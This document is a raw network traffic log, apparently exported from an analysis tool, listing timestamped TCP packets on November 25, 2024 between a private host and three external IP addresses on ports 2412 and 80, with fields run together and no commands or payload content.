                                                                                                                                                                                Nov 25, 2024 14:07:28.386921883 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.402556896 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.402574062 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.402611971 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.416981936 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.417231083 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.417269945 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.439371109 CET8049176178.237.33.50192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.439429998 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:07:28.479990959 CET491742412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.597220898 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.597337008 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.597404003 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.601659060 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.602044106 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.602104902 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.610390902 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.610512018 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.610555887 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.619143963 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.619297028 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.619347095 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.628101110 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.628122091 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.628185987 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.636812925 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.636939049 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.636986017 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.643770933 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.645571947 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.645690918 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.645733118 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.654623032 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.654695988 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.654731035 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.663685083 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.663803101 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.663840055 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.673293114 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.673419952 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.673470020 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.684089899 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.684108973 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.684153080 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.689930916 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.690042973 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.690082073 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:28.807651997 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:28.807698965 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.257232904 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.257281065 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.259933949 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.260032892 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.260082960 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.263071060 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.263215065 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.263257027 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.265973091 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.266143084 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.266186953 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.268881083 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.269006014 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.269059896 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.271960020 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.271981955 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.272030115 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.274832010 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.274961948 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.275022030 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.277820110 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.277937889 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.277995110 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.283384085 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.283534050 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.283571959 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.285231113 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.285247087 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.285279989 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.287729025 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.287889957 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.287940025 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.290747881 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.290985107 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.291028023 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.293577909 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.293592930 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.293632030 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.296176910 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.296464920 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.296504974 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.299376011 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.299537897 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.299583912 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.301758051 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.301841974 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.301887035 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.349142075 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.349303007 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.349360943 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.350620985 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.350687981 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.350733042 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.353648901 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.353739023 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.353779078 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.356630087 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.356661081 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.356707096 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.360409975 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.360513926 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.360575914 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.363032103 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.363182068 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.363230944 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.366036892 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.366164923 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.366224051 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.369237900 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.369261026 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.369311094 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.372003078 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.372066975 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.372114897 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.375102997 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.375171900 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.375225067 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.378134012 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.378232956 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.378292084 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.381001949 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.381083012 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.381154060 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.384525061 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.384588957 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.384637117 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.386100054 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.388017893 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.388178110 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.388217926 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.391047955 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.391175032 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.391218901 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.394046068 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.394236088 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.394289017 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.397098064 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.397367001 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.397418022 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.400069952 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.400167942 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.400213957 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.440536976 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.440551043 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.440586090 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.441222906 CET8049176178.237.33.50192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.441272974 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:07:29.441595078 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.441606045 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.441643953 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.443161011 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.443296909 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.443335056 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.652138948 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.652157068 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.652721882 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.652772903 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.652818918 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.654247999 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.654284000 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.654306889 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.655405045 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.655459881 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.655493975 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.656817913 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.656871080 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.656881094 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.658227921 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.658279896 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.658318996 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.659229040 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.659454107 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.659621954 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.659666061 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.660815001 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.660944939 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.660983086 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.662170887 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.662301064 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.662343025 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.663429022 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.663661957 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.663707972 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.664707899 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.664832115 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.664872885 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.666021109 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.666110992 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.666152000 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.667212963 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.667330980 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.667371988 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.668493986 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.668565035 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.668605089 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.669734001 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.669867039 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.669909000 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.670993090 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.671123028 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.671178102 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.672172070 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.672300100 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.672348976 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.673386097 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.673441887 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.673480988 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.674704075 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.674776077 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.674817085 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.675739050 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.675832033 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.675879002 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.677004099 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.677016020 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.677051067 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.678209066 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.678414106 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.678462982 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.679301023 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.679423094 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.679466963 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.680450916 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.680612087 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.680651903 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.681689024 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.681777000 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.681823015 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.682853937 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.682991982 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.683037996 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.684094906 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.684346914 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.684393883 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.685287952 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.685431004 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.685477018 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.686427116 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.686534882 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.686582088 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.687495947 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.687594891 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.687644005 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.688571930 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.688673019 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.688719988 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.689687967 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.689747095 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.689790010 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.690782070 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.690901041 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.690948009 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.691814899 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.691912889 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.691967010 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.692895889 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.693011045 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.693052053 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.694209099 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.694402933 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.694451094 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.695128918 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.695223093 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.695267916 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.696180105 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.696302891 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.994962931 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.995014906 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.998935938 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.999105930 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.999154091 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.003241062 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.003393888 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.003441095 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.007457018 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.007555962 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.007596016 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.012769938 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.012835026 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.012892008 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.016870975 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.016963005 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.017008066 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.020895004 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.021025896 CET8049177172.234.205.135192.168.2.22
